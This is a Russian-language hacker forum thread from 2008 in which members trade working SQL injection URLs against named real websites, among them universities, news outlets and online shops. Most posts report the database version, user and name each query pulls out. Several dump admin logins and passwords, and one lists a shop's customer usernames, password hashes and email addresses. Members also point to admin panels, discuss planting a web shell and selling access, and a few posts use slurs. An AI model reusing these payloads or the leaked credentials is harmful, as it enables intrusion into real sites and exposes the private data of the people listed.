SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. d1aVOL

    d1aVOL Elder - Старейшина

    Joined:
    29 Jul 2007
    Messages:
    37
    Likes Received:
    6
    Reputations:
    0
    http://www.electionguide.org/country-news.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50--
    версия 4.1.22
    юзер eguide@localhost

    зы: цыфарка 3 экранируется в титле
     
  2. masternet

    masternet Elder - Старейшина

    Joined:
    18 May 2008
    Messages:
    58
    Likes Received:
    43
    Reputations:
    0
    http://www.archdioceseofcolombo.com/news.php?id=-1+union+select+1,2,3,concat_ws(char(32,45,32),version(),user(),database()),5,6,7,8,9,10,11,12,13--
    4.1.20-max-log - [email protected] - rajindu_bishop
    ---------------------
    http://www.northwestu.edu/news/news.php?id=-1+union+select+1,2,3,concat_ws(char(32,45,32),version(),user(),database()),5,6,7,8,9,10,11,12--
    5.0.45-community-nt - root@localhost - news
    ----------------------
    http://www.entrepreneurship.appstate.edu/news.php?id=-1+union+select+1,concat_ws(char(32,45,32),version(),user(),database()),3,4,5,6--
    4.1.22 - entrepreneur@localhost - entrepreneur
    ---------------------
    http://www.eiu.edu/~slo/news.php?id=-1+union+select+1,concat_ws(char(32,45,32),version(),user(),database()),3,4,5--
    4.1.22-log - slo@localhost - slo
    -------------------------------------
    http://www.sinfonie-hausverwaltung.de/news.php?id=-1+union+select+1,2,3,concat_ws(char(32,45,32),version(),user(),database()),5,6,7,8,9,10,11,12,13,14,15--

    4.0.18 - sinfonie@localhost - sinfonie
    ---------------------------
    http://svpressa.ru/issue/news.php?id=-1+union+select+1,2,concat_ws(char(32,45,32),version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
    5.0.51a-log - svpressa@localhost - svpressa
    -----------------
    http://www.trud.ru/issue/news.php?id=-1+union+select+1,2,concat_ws(char(32,45,32),version(),user(),database()),4,5,6,7,8--
    4.1.21-log - trudinfo@localhost - trudinfo_db
    ---------------------
    http://www.astrakhanfm.ru/news/news.php?id=-1+union+select+1,concat_ws(char(32,45,32),version(),user(),database()),3,4,5,6,7--
    4.0.24-standart-log -astrakhanru@localhost -astrakhanru
    ------------------------
    http://www.fmaestro.ru/news.php?id=-1+union+select+1,2,3,4,concat_ws(char(32,45,32),version(),user(),database()),6--
    4.0.23-standard - fmaestro1@localhost - db_fmaestro1
     
    #7002 masternet, 10 Dec 2008
    Last edited: 10 Dec 2008
  3. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19

    Code:
    http://new.groteck.ru/rss/?site_id=-1+union+select +1,2,3,4--
    Поля 3 и 4 принтабельны.

    Version() - 5.0.45-log

    ====================================================

    "Лучший сайт Будапешта в интернете"

    Code:
    http://budapest-town.net/index.php?module=news&target=article&type=&category=&id=-1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5--
    Version() - 4.1.22

    Префикс таблиц tps_


    admin/217a968c3f6a1d9d9cf8784d1c83ca43 : tibor


    ====================================================

    "TOP-MANAGER [ журнал для руководителей ]"

    Code:
    http://www.top-manager.ru/?a=1&number=-1+union+select+1,2,3,concat_ws(0x2f,table_name,table_rows,table_schema),5,6+from+information_schema.tables--
     
    #7003 R1dex, 10 Dec 2008
    Last edited: 10 Dec 2008
  4. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Журнал "Чайка"
    PR:3 тИЦ:500

    http://www.chayka.org/article.php?id=-872+union+select+1,2,3,4,5,6,7,8,9,10,11--
    seagullmag@localhost:seagullmag:5.0.51a
    Кавычки не фильтруются, но load_file не доступен.
    Т.к. 5 версия можно перебирать таблицы...
    Я нашел таблицу: ibf_members

    P.S Вот, что я еще нашел)) http://www.chayka.org/db.inc. Ошибка вылетеле при заходе в /images/
     
    #7004 Tigger, 11 Dec 2008
    Last edited: 11 Dec 2008
  5. spherics

    spherics Elder - Старейшина

    Joined:
    14 Jan 2008
    Messages:
    190
    Likes Received:
    162
    Reputations:
    25
    http://www.msfacts.org/online_newsDetails.php?ID=-123+union+select+1,2,version(),user(),5,database()/*

    version:4.0.24-standard
    user:root@localhost
    database:msf_db

    С мускула логин и пароль

    root:SQLadmin
     
  6. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    Е***шим по беспределу буржуйские чаты....
    Вроде как сексуальные меньшинства там еще тусуются!!!
    Смело помогаем админить этот отвратительный ресурс!!!

    http://www.prassel.nu/index.php?page=ads&adno=-1+union+select+concat_ws
    (0x3a3a,name,password,email),2,3+from+user+limit+1,1--

    login:mats
    pass:lkll00lkll00
     
  7. masternet

    masternet Elder - Старейшина

    Joined:
    18 May 2008
    Messages:
    58
    Likes Received:
    43
    Reputations:
    0
    http://www.greetingcard.org/about.php?ID=-1+union+select+1,concat_ws(char(32,45,32),version(),user(),database()),3,4,5,6,7,8,9,10--
    5.0.67 - greetingcard@localhost - greetingcard_org_-_maindb
    --------------------------------
    http://www.simonsig.co.za/about.php?id=-1+union+select+1,concat_ws(char(3245,32),version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
    5.0.51a-3ubuntu5.1-log ? [email protected] ? simonsig
    -------------------
    http://catalog.belstrin.ru/site.php?id=-1+union+select+1,concat_ws(char(32,45,32),version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
    4.1.21-standard-log - clclon_user@localhost - clclon_catalogbelstrin
    ---------------------------
    http://vis.vis-belogorje.ru/site.php?id=-1+union+select+concat_ws(char(32,45,32),version(%20),user(),database()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
    4.1.21-standard-log - clclon_user@localhost - clclon_visbelogorje
    -----------------------------
     
    #7007 masternet, 11 Dec 2008
    Last edited: 11 Dec 2008
  8. Snap

    Snap Elder - Старейшина

    Joined:
    5 Feb 2007
    Messages:
    61
    Likes Received:
    33
    Reputations:
    -4
    _http://rifma.ru

    http://rifma.ru/rifma.php?curr_node=55+union+select+1,concat(user_name,char(58),user_password),3,4,5,6,7,8+from+users+limit+0,1/*

    Скуля есть, но вывод не сделал есть фильтрация в параметре "curr_node". Если не сложно подскажите как обойти.

    Заранее спасибо.
     
  9. masternet

    masternet Elder - Старейшина

    Joined:
    18 May 2008
    Messages:
    58
    Likes Received:
    43
    Reputations:
    0
    http://cgsc2.biology.yale.edu/Site.php?ID=-1+union+select+1,concat_ws(char(32,45,32),version(),user(),database()),3,4,5,6,7,8,9--
    5.0.27-standard-log - WebUser@localhost - cgsc
    PR: 6
    -------------------------
    http://www.adilsoz.kz/site.php?id=7&lan=english&newsid=-1+union+select+concat_ws(char(32,45,32),version(),user(),database())--
    5.0.41-community-nt - adilsoz@localhost - adilsoz
    ТИЦ: 160
    PR: 2
    -----------------------
    http://www.oxygenna.com/site.php?id=-1+union+select+1,concat_ws(char(32,45,32),version(),user(),database()),3,4,5,6,7,8--
    5.0.27-community-nt - oxygenna@localhost - oxygenna
    PR: 3
    --------------------
    http://epodsolar.com/site.php?id=-1+union+select+1,concat_ws(char(32,45,32),version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--
    4.1.20 - epodsol_usr1@localhost - epodsol_cm
    PR: 5
    -------------------
    http://gavlab.auburn.edu/about.php?id=-1+union+select+1,2,concat_ws(char(32,45,32),version(),user(),database()),4--
    4.1.22-log - [email protected] - gavlab
    PR: 4
    --------------------
    http://www.swiss.org.nz/home.php?ID=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(char(32,45,32),version(),user(),database()),10,11,12,13,14,15,16,17,18,19--
    4.1.21-standard-log - [email protected] - swisst db
    ТИЦ : 10 PR: 4
    ----------------------
    http://www.poveditions.com/home.php?id=-1+union+select+concat_ws(char(32,45,32),version(),user(),database()),2--
    ТИЦ : 10 PR: 4
    ----------------------
     
    #7009 masternet, 11 Dec 2008
    Last edited: 11 Dec 2008
  10. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    masternet, в http://cgsc2.biology.yale.edu кавычки не фильтруются и file priv разрешен. Найдешь путь - зальешь шелл))
     
  11. masternet

    masternet Elder - Старейшина

    Joined:
    18 May 2008
    Messages:
    58
    Likes Received:
    43
    Reputations:
    0
    а как путь узнать?вот в чём вопрос..так бы уже залил и продал)
    у меня в дампере также..
    Y - file priv
     
    #7011 masternet, 11 Dec 2008
    Last edited: 11 Dec 2008
  12. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    masternet,
    Тема не для вопросов и комментариев
    Tigger
    С чего ты взял, что file_priv Y ?

    http://cgsc2.biology.yale.edu/Site.php?ID=-1+union+select+1,file_priv,3,4,5,6,7,8,9+from+mysql.user+where+user='WebUser'--
    "N"
     
    2 people like this.
  13. gisTy

    gisTy Elder - Старейшина

    Joined:
    24 May 2008
    Messages:
    432
    Likes Received:
    160
    Reputations:
    27
    version( 5.0.15-standard )
    user(
    toutec@localhost )
    database(
    toutec )
    ##########
    version( 4.1.15-Debian_1ubuntu5-log )
    user(
    webrider@localhost )
    database(
    webridershop )

    ##############
    version( 4.1.22-log )
    user(
    [email protected] )
    database(
    formule19 )
     
    #7013 gisTy, 12 Dec 2008
    Last edited: 12 Dec 2008
  14. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    pr7 похоже на форум международного оператора сотовой связи Оранж, но мб и ошибаюсь.
    Db: bddforums
    Version: 4.1.11-Debian_4sarge7-log
    User: [email protected]
     
  15. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    http://www.pcr.org.ar/hoy.php?id_nota=-1+union+select+concat_ws(0x3a3a,usuario,clave)+from+usuarios+limit+0,1/*

    login: tansimPLE
    pass: IHfr78MET

    Админка
    http://www.pcr.org.ar/admin/_administrar.php?area=nomenclador

    Коммуняки плиять...
     
    1 person likes this.
  16. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    http://www.exoticangkor.com/hotels.php?city_id=-1+union+select+1,2,3,4,concat_ws(0x3a3a,username,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+tbl_user+limit+0,1--



    http://www.exoticangkor.com/admin/


    Баанк!! (Co Джей иМолчаливый Боб)


    -----------------------------------------------------------

    http://www.trinergy.at/pop_lexikon.php?id=-1+union+select+1,concat_ws(0x3a3a,username,password),3,4+from+users+limit+0,1/*

    http://www.trinergy.at/admin

    login:CW
    pass:CW

    Куяк!!!!
    ---------------------------------------------------------
     
    #7016 Cennarios, 12 Dec 2008
    Last edited: 12 Dec 2008
  17. spherics

    spherics Elder - Старейшина

    Joined:
    14 Jan 2008
    Messages:
    190
    Likes Received:
    162
    Reputations:
    25
    Магазинчик...

    http://www.zakaz.kr.ua/vitrina/tovar/?lev1=9&lev2=12&lev3=17&id=-170/**/UNION/**/SELECT/**/AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT/**/CONCAT(id,0x7873716C696E6A64656C,login,0x7873716C696E6A64656C,pass,0x7873716C696E6A64656C,mymail)/**/FROM/**/zakazkr_zakaz.customers/**/LIMIT/**/5,1),0x7873716C696E6A656E64),0x71),0x71),2,3,4,5,6,7,8,9,10,11,12,13--

    Добил их пользователей много всех не стал кому надо далее сам...


    [1]:6:karlsson:5a89ed8db9c4a2a2406d570da13e2560:[email protected]
    [2]:7:test:c4ca4238a0b923820dcc509a6f75849b:[email protected] 1
    [3]:8:vitaliy:12d72e349bedf045166bf79ae9c66242:[email protected] passwd:0708gw
    [4]:9:amigo:a9de3c617cb8e7fab847b08ea1a80e42:[email protected] passwd:g-shock
    [5]:10:lelikx:42019dd47db5aeed2091398fadea7c0b:[email protected] passwd:666123
    [6]:11:vovan-bmw:8ebfbd869222118c7716a8e87c94dde2:[email protected]
    [7]:12:Хохол:ca56097a3dc3bf5e0626c4da3c84d7a4:[email protected] passwd:180297
    [8]:13:artur:c9b5ecdf0b853aab02103542187ea208:[email protected] passwd:artur
    [9]:14:asd:cb2c631d23f3e2f9a5d79171c8c1d141:[email protected]
    [10]:15:xXx:a4f59177af1c5586e49c16a142b2a793:
    [11]:16:dimitrius:6e8b08a1285fda750437a1677b0d3286:[email protected]
    [12]:17:Igor:8b65ac266262fd4f65e1d4a169fedbfd:[email protected] passwd:311181
    [13]:18:Garik:7b90ad7525dbd9a141f76f47f2dd7da5:[email protected]
    [14]:19:SNIPER:67c6a1e7ce56d3d6fa748ab6d9af3fd7:eek:[email protected] passwd:47
     
  18. Dimi4

    Dimi4 Чайный пакетик

    Joined:
    19 Mar 2007
    Messages:
    750
    Likes Received:
    1,046
    Reputations:
    291
    Адрес: www.wbdg.org (74.205.45.163)

    Google PR 7 / 10
    Яндекс тІЦ 60

    Code:
    http://www.wbdg.org/ccb/browse_cat.php?o=29&c=-4+union+select+concat_ws(0x3a3a,database(),version(),user()),2--
    Database Version: 5.0.67
    Database name: ccb
    User name: webscript@localhost
     
    2 people like this.
  19. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    http://www.nrru.ac.th/web/healthcenter/main.php?pack=readnews&news_id=-1+union+select+1,user_name,3,user_pass,5,6,7,8+from+core_user+limit+0,1/*

    http://www.nrru.ac.th/web/healthcenter/admin/main.php

    login: admin
    pass: 12345678


    Арабикан гомикас похекас!!! lol
     
  20. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    Code:
    http://www.globalresearch.ca/PrintArticle.php?articleId=1+union+select+1,concat_ws(0x3a,VERSION(), USER(), DATABASE()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52/*
    5.0.24a-log:u70167021@cgihost:d60162207
     
Thread Status:
Not open for further replies.